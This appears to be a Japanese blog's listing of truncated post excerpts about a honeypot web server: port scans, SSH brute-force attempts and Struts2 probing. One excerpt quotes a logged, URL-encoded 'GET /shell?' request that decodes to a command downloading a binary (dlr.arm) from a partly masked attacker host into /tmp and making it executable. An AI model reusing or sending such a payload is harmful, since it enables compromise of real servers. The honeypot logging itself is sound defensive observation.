不正アクセス
ハニーポット用にたてているWebサーバー。 基本的にハニーポットに届く通信とサーバ管理用で必要な通信ポート以外ブロックをしてログに記録しております。 そこで、どんなサービスに対してスキャンが来ているのだろうと思い、ブロックされているポートと件数…
だいぶ間が開いてしまった情報ですが、7月はsshへの不正ログインの試行が非常に多かったです。 計428件。平均14件/日くらいだったみたい。 なかでもこの月は日本人の苗字を使ったアカウントによるアクセスがけっこうありました。そのほとんどが国内のIPアド…
前回から少し間が開いてしまいましたが、その間sshに対する大量のログイン試行がありました。 41時間かけて10分間隔でダラダラとログインを試していたようです。 以下がログイン試行に使われたアカウント達です。 admin的なものもあればOS名もあればCMS名も…
初めてこのログを見たときは少しびっくりしました。 40秒ほどのあいだに以下のログが記録されてて「ヤバい!なんかされてる!」と焦ってしまいましたが、ネットで調べてみるとたくさん報告されてますね。 ーーーーーーーーーーーーーーーーーーーーーーーー…
Struts2攻撃と思われるものに交じって、こんなのが来てました。 「GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%XX%XX%2E%XX%XX%XX%2E%XX%XX%XX%2E%XX%XX%3A%35%34%33%32%31%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%…
本日朝も以下のような探索ログが残っていました。 始めから終わりまで10秒間かけて順番に該当するものがあるか試してるみたいです。 Strutsってデフォルトこういうディレクトリ構成なの???(私は知見がないためわからないです) ちなみに発信元はドイツで…
3/23以降、今話題のApache Struts2の脆弱性(S2-045)を狙っているのかもしれないアクセスが急に来ていました。 Struts2を利用していると「.aciton」がURLに付くというのをWeb上で見ましたので、上記は今回の脆弱性を狙う攻撃につながるアクセスなのかなぁと…